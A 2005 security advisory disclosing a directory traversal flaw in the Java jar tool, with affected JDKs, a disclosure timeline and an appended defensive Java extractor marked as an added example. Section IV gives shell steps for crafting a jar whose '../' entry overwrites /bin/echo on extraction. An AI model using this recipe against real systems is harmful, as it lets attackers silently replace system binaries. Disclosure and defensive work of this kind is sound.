7a69Adv#23 - Jar tool directory traversal vulnerability



- ------------------------------------------------------------------
       7a69ezine Advisories                      7a69Adv#23
- ------------------------------------------------------------------
  http://www.7a69ezine.org                            [01/04/2005]
- ------------------------------------------------------------------

Title:        Jar tool directory traversal vulnerability

Author:       Pluf - <pluf@xxxxxxxxxxxxx>

Remote:       no

Exploit:      yes

Severity:     Medium-High

- ------------------------------------------------------------------




I. Introduction.

Jar is a Java archiving and compression application that ships with
many Java development kits. It was designed mainly to package Java
applets or applications into a single archive.




II. Description.

The jar tool does not properly check whether the names of the files to
be extracted contain the string "../", so an attacker can craft a
malicious jar file that overwrites arbitrary files on the filesystem
when it is extracted.




III. Affected Software.

The following Java development kits have been tested and contain the
vulnerability; other kits and/or platforms may be affected as well:
 
 * SUN:

    Sun's J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version)
    Sun's J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version)

 * IBM:

    IBM Java Development Kit 1.4.2 Linux 

 * BEA:

    BEA WebLogic's J2SE Development Kit, version 1.5.0 (Linux and Windows version)

 * BLACKDOWN:

    Blackdown Java Development Kit 1.4.2 Linux




IV. Exploit.

A malicious jar file can be created as follows:

java4fun# echo hi
hi
java4fun# jar cvf trash.jar *.class ..o..o..o..o..o..o..obinoecho
java4fun# ht trash.jar   (change the 'o' by '/')
java4fun# jar xvf trash.jar (no overwrite message confirmation)
java4fun# echo hi
hi, you've just infected yourself!!!




V. Patch.

Not available. 
Use unzip instead of jar.
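As a defensive counterpart to the "jar xvf" step in section IV and to the workaround above, the following program is an added example (not the JDK's own jar tool code and not part of the original advisory). It extracts a jar into a target directory, but canonicalises every entry's destination path first and refuses any entry that would resolve outside that directory, and it also refuses to overwrite an existing file instead of silently clobbering it. The main() method builds a constructed jar in a temporary directory with one benign entry and one "../" entry so the check can be seen rejecting the traversal; the class name SafeJarExtract and the entry names are assumptions of this example.

```java
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.file.Files;
import java.util.ArrayList;
import java.util.Enumeration;
import java.util.List;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.jar.JarOutputStream;

/**
 * SafeJarExtract: extracts a jar into targetDir, rejecting entries whose
 * resolved path escapes targetDir (e.g. names containing "../").
 * Added example; this is not the JDK jar tool's implementation.
 */
public class SafeJarExtract {

    /** Extracts jar into targetDir and returns the entry names that were rejected. */
    public static List<String> extract(File jar, File targetDir) throws IOException {
        List<String> rejected = new ArrayList<String>();
        // Trailing separator so that "/tmp/out-evil" is not mistaken for "/tmp/out/..."
        String root = targetDir.getCanonicalPath() + File.separator;

        try (JarFile jf = new JarFile(jar)) {
            Enumeration<JarEntry> entries = jf.entries();
            while (entries.hasMoreElements()) {
                JarEntry entry = entries.nextElement();
                File out = new File(targetDir, entry.getName());
                // getCanonicalPath() collapses ".." segments and resolves symlinks,
                // so the containment check below sees the real destination.
                String canonical = out.getCanonicalPath();
                if (!canonical.startsWith(root)) {
                    rejected.add(entry.getName());      // would land outside targetDir
                    continue;
                }
                if (entry.isDirectory()) {
                    out.mkdirs();
                    continue;
                }
                out.getParentFile().mkdirs();
                if (out.exists()) {
                    rejected.add(entry.getName());      // refuse to overwrite silently
                    continue;
                }
                try (InputStream in = jf.getInputStream(entry);
                     OutputStream os = new FileOutputStream(out)) {
                    copy(in, os);
                }
            }
        }
        return rejected;
    }

    private static void copy(InputStream in, OutputStream out) throws IOException {
        byte[] buf = new byte[8192];
        int n;
        while ((n = in.read(buf)) != -1) {
            out.write(buf, 0, n);
        }
    }

    /** Builds a constructed test jar containing one normal entry and one traversal entry. */
    static File buildSampleJar(File dir) throws IOException {
        File jar = new File(dir, "sample.jar");
        try (JarOutputStream jos = new JarOutputStream(new FileOutputStream(jar))) {
            jos.putNextEntry(new JarEntry("Hello.txt"));            // benign entry
            jos.write("hello".getBytes("UTF-8"));
            jos.closeEntry();
            jos.putNextEntry(new JarEntry("../../escaped.txt"));    // constructed traversal entry
            jos.write("should never be written".getBytes("UTF-8"));
            jos.closeEntry();
        }
        return jar;
    }

    public static void main(String[] args) throws IOException {
        File tmp = Files.createTempDirectory("safejar").toFile();
        File jar = buildSampleJar(tmp);
        File dest = new File(tmp, "extracted");
        dest.mkdirs();

        List<String> rejected = extract(jar, dest);
        System.out.println("extracted into: " + dest);
        System.out.println("rejected entries: " + rejected);   // expected: [../../escaped.txt]
        System.out.println("Hello.txt present: " + new File(dest, "Hello.txt").exists());
    }
}
```

The check deliberately compares canonical paths rather than searching the entry name for "../": a name-based filter misses encoded or platform-specific variants (backslashes on Windows, absolute paths, symlinked directories), whereas the canonical destination is what the operating system will actually open. The same pattern applies to any archive extractor, not only jar.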




VI. Timeline.

23/03/2005  Bug discovered.
28/03/2005  Mail sent to vendors.
28/03/2005  Sun response.
02/04/2005  Mail sent to vendors (second try).
09/04/2005  Advisory released.




VII. Extra data

 You can find more 7a69ezine advisories at the following link:

    http://www.7a69ezine.org/avisos/propios [spanish info]